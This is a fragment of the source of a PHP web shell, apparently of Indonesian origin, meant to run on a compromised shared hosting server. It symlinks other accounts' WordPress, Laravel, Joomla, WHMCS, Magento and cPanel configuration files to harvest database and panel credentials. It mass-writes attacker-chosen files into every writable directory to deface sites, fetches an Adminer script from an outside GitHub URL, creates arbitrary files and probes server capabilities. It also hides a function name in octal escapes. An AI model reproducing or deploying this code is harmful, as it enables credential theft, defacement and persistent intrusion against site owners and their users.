@symlink('/home/' . $user . '/htdocs/wp-config.php', $user . '-Wp-htdocs.txt');
@symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-Wp2.txt');
@symlink('/home/' . $user . '/public_html/web/wp-config.php', $user . '-Wp3.txt');
@symlink('/home1/' . $user . '/public_html/wp-config.php', $user . '-WpHm1.txt');
@symlink('/home2/' . $user . '/public_html/wp-config.php', $user . '-WpHm2.txt');
@symlink('/home3/' . $user . '/public_html/wp-config.php', $user . '-WpHm3.txt');
@symlink('/var/www/html/wp-config.php', $v . '-wp1.txt');
@symlink('/home/' . $user . '/public_html/.env', $user . '-Laravel1.txt');
@symlink('/home/' . $user . '/public_html/web/.env', $user . '-Laravel2.txt');
@symlink('/home/' . $user . '/public_html/public/.env', $user . '-Laravel3.txt');
@symlink('/var/www/html/.env', $v . '-LaravelV.txt');
@symlink('/home/' . $user . '/public_html/configuration.php', $user . '-Joomla1.txt');
@symlink('/home/' . $user . '/public_html/html/configuration.php', $user . '-Joomla2.txt');
@symlink('/home/' . $user . '/public_html/web/configuration.php', $user . '-Joomla3.txt');
@symlink('/home/' . $user . '/public_html/whm/configuration.php', $user . '-Whm1.txt');
@symlink('/home/' . $user . '/public_html/whmc/configuration.php', $user . '-Whm2.txt');
@symlink('/home/' . $user . '/public_html/support/configuration.php', $user . '-Whm3.txt');
@symlink('/home/' . $user . '/public_html/client/configuration.php', $user . '-Whm4.txt');
@symlink('/home/' . $user . '/public_html/billings/configuration.php', $user . '-Whm5.txt');
@symlink('/home/' . $user . '/public_html/billing/configuration.php', $user . '-Whm6.txt');
@symlink('/home/' . $user . '/public_html/clients/configuration.php', $user . '-Whm7.txt');
@symlink('/home/' . $user . '/public_html/whmcs/configuration.php', $user . '-Whm8.txt');
@symlink('/home/' . $user . '/public_html/order/configuration.php', $user . '-Whm9.txt');
@symlink('/home/' . $user . '/public_html/app/etc/local.xml', $user . '-Magento.txt');
@symlink('/home/' . $user . '/public_html/configuration.php', $user . '-Joomla.txt');
@symlink('/home/' . $user . '/public_html/application/config/database.php', $user . '-CodeIgniter.txt');
@symlink('/home/' . $user . '/public_html/web/application/config/database.php', $user . '-CodeIgniterH.txt');
@symlink('/home1/' . $user . '/public_html/application/config/database.php', $user . '-CodeIgniter1.txt');
@symlink('/home2/' . $user . '/public_html/application/config/database.php', $user . '-CodeIgniter2.txt');
@symlink('/home3/' . $user . '/public_html/application/config/database.php', $user . '-CodeIgniter3.txt');
@symlink('/home/' . $user . '/.my.cnf', $user . '-cpanel.txt');
@symlink('/home/' . $user . '/.accesshash', $user . '-whm.txt');
@symlink('/home/' . $user . '/public_html/admin/config.php', $user . '-opencart.txt');
@symlink('/home/' . $user . '/public_html/app/etc/local.xml', $user . '-mangento.txt');
echo '
';
}
exit();
} elseif ($_REQUEST[net('scanshell')] == "opet") {
echo "
";
if (isset($_POST['submit'])) {
function scan_directory($dir)
{
$ext = $_POST['ext'];
$rdi = new RecursiveDirectoryIterator($dir);
echo "";
foreach (new RecursiveIteratorIterator($rdi) as $filename => $file) {
if (pathinfo($filename, PATHINFO_EXTENSION) == $ext) {
$content = file_get_contents($filename);
if (preg_match('/(eval|base64_decode|str_rot13|mass_deface|addrdp|@exec|@passthru|@chmod|#exec|deface|command|{IFS}|shell_exec|SERVER_SOFTWARE|wget|@get_current_user|@getmygid|htmlspecialchars_decode|B374k|@getmygid|hacked|exe_root|xploit|Disable_Function|backdoor|backconnect|gecko-select|php_uname|Alfa-Team|ALFA_DATA|MARIJUANA|blackeagleteam|IndoSec|getHostByName|alfashell|php-obfuscator|gacor|slot-gacor|slot88|featureShell|move_upload_file|upload)\s*\(/i', $content)) {
echo "Found : $filename => Detected view \n";
}
}
}
}
$cek = $_POST['peth'];
if ($cek) {
scan_directory($cek);
echo "Scan Completed..!! |
";
}
}
exit();
} elseif ($_REQUEST[net('massdef')] == "opet") {
function sabun_massal($serlok, $namafile, $isi_script)
{
if (is_writable($serlok)) {
$dira = scandir($serlok);
foreach ($dira as $dirb) {
$dirc = "$serlok/$dirb";
$lokasi = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[DONE] $serlok
";
file_put_contents($lokasi, $isi_script);
$idx = sabun_massal($dirc, $namafile, $isi_script);
}
}
}
}
}
}
function sabun_biasa($serlok, $namafile, $isi_script)
{
if (is_writable($serlok)) {
$dira = scandir($serlok);
foreach ($dira as $dirb) {
$dirc = "$serlok/$dirb";
$lokasi = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo " http://$dirb/$namafile
";
file_put_contents($lokasi, $isi_script);
}
}
}
}
}
}
if ($_POST['start']) {
if ($_POST['tipe_sabun'] == 'mahal') {
echo "| ";
sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo " |
";
} elseif ($_POST['tipe_sabun'] == 'murah') {
echo "| ";
sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo " |
";
}
} else {
echo "";
}
exit();
} elseif ($_REQUEST[net('ner')] == "opet") {
function crot($url)
{
$d7net = curl_init($url);
curl_setopt($d7net, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($d7net, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($d7net, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($d7net, CURLOPT_HEADER, 0);
return curl_exec($d7net);
curl_close($d7net);
}
echo "
";
if (isset($_POST['gass'])) {
if (empty($_POST['miner'])) {
echo "";
} else {
$check = $serlok . "/" . $_POST['miner'];
$result = str_replace($_SERVER['DOCUMENT_ROOT'], $web . "", $check);
$content = crot('https://raw.githubusercontent.com/bellpwn/netxploit/main/adminer.php');
$open = fopen($check, 'w');
fwrite($open, $content);
fclose($open);
if (file_exists($check)) {
echo "";
} else {
echo "| Failed to create adminer..!! |
";
}
}
}
exit();
} elseif ($_REQUEST[net('buatfile')] == "opet") {
function createfile()
{
$pat = $_GET['path'];
$nama_file = $_POST['nama_file'];
$isi_file = $_POST['isi_file'];
$handle = fopen("$pat/$nama_file", 'w');
$files = $_GET['path'] . "/" . $nama_file;
$asu = str_replace($_SERVER['DOCUMENT_ROOT'], $web . "", $files);
if (fwrite($handle, $isi_file)) {
echo 'Created => ' . $pat . '/' . $nama_file . '
Link : Click here |
';
} else {
echo '| Failed to create file..!! |
';
}
}
if (!isset($_POST['bikin'])) {
echo "
";
} else {
createfile();
}
exit();
} elseif ($_GET[net('buatfolder')] == "opet") {
function createDirectory()
{
if (empty($_POST['add'])) {
echo '';
} else {
$add = $_POST["add"];
$d7net = mkdir($_GET['path'] . "/" . $add);
if ($d7net == true) {
echo "";
} else {
echo "| Failed to create folder : $add |
";
}
}
}
if (!isset($_POST['submit'])) {
echo '';
} else {
createDirectory();
}
exit();
} elseif ($_REQUEST[net('info')] == "opet") {
echo "
";
echo "Server : " . $_SERVER['HTTP_HOST'] . "
";
echo "Server IP : " . ipserv() . "
Your IP : " . $_SERVER['REMOTE_ADDR'] . "
";
echo "Web Server : " . $_SERVER['SERVER_SOFTWARE'] . "
";
echo "System : " . php_uname() . "
";
echo "User : " . @get_current_user() . " ( " . @getmyuid() . ")
";
echo "PHP Version : " . @phpversion() . " => " . php_sapi_name() . "
";
echo " | | Disable Function : " . $disf . "";
echo " | ";
echo "
Orecle : ";
if (function_exists('oci_connect')) {
echo "ON";
} else {
echo "OFF";
echo " | SSH2 : ";
}
if (function_exists('ssh2_connect')) {
echo "ON";
} else {
echo "OFF";
echo " | MySQL : ";
}
if (function_exists("mysql_connect")) {
echo "ON";
} else {
echo "OFF";
}
echo " | cURL : ";
if (function_exists("curl_init")) {
echo "ON";
} else {
echo "OFF";
}
echo " | WGET : ";
if (file_exists("/usr/bin/wget")) {
echo "ON";
} else {
echo "OFF";
}
echo " | Perl : ";
if (file_exists("/usr/bin/perl")) {
echo "ON";
} else {
echo "OFF";
}
echo " | Python : ";
if (file_exists("/usr/bin/python2")) {
echo "ON";
} else {
echo "OFF";
}
$pkexec = (@shell_exec("pkexec --version")) ? "ON" : "OFF";
echo " | PKEXEC : $pkexec
";
echo " |
";
exit();
}
if (!is_readable($serlok)) {
die("| This directory is unreadable :( |
");
}
echo '
| Name |
Size |
Last Modified |
Owner |
Permissions |
Actions |
';
$scd = "\163\143" . "\141\156\144" . "\151\162";
if (is_readable($serlok)) {
$fetch = $scd($serlok);
$serlokbos = array();
$filez = array();
foreach ($fetch as $fols) {
if ($fols == '.' || $fols == '..') {
continue;
}
$d7nets = $serlok . '/' . $fols;
if (is_dir($d7nets)) {
array_push($serlokbos, $fols);
} elseif (is_file($d7nets)) {
array_push($filez, $fols);
}
}
}
foreach ($serlokbos as $dir) {
echo "
| " . $dir . " |
Dir |
" . filedate($serlok . "/" . $dir) . " |
" . owner($serlok . "/" . $dir) . " |
";
if (is_writable($serlok . "/" . $dir)) echo '';
elseif (!is_readable($serlok . "/" . $dir)) echo '';
echo statusnya($serlok . "/" . $dir);
if (is_writable($serlok . "/" . $dir) || !is_readable($serlok . "/" . $dir)) echo '';
echo " |
|
";
}
foreach ($filez as $file) {
if (!is_file("$serlok/$file")) continue;
$size = filesize("$serlok/$file") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = '' . round($size / 1024, 2) . ' MB';
} else {
$size = '' . $size . ' KB';
}
echo "
| " . cekfile($serlok . "/" . $file) . "
$file |
" . $size . " |
" . filedate($serlok . "/" . $file) . " |
" . owner($serlok . "/" . $file) . " |
";
if (is_writable("$serlok/$file")) echo '';
elseif (!is_readable("$serlok/$file")) echo '';
echo statusnya("$serlok/$file");
if (is_writable("$serlok/$file") || !is_readable("$serlok/$file")) echo '';
echo " |
| ";
}
echo ' |
';
author();
function statusnya($file)
{
$izin = substr(sprintf('%o', fileperms($file)), -4);
return $izin;
}
?>
|
|
|
|
|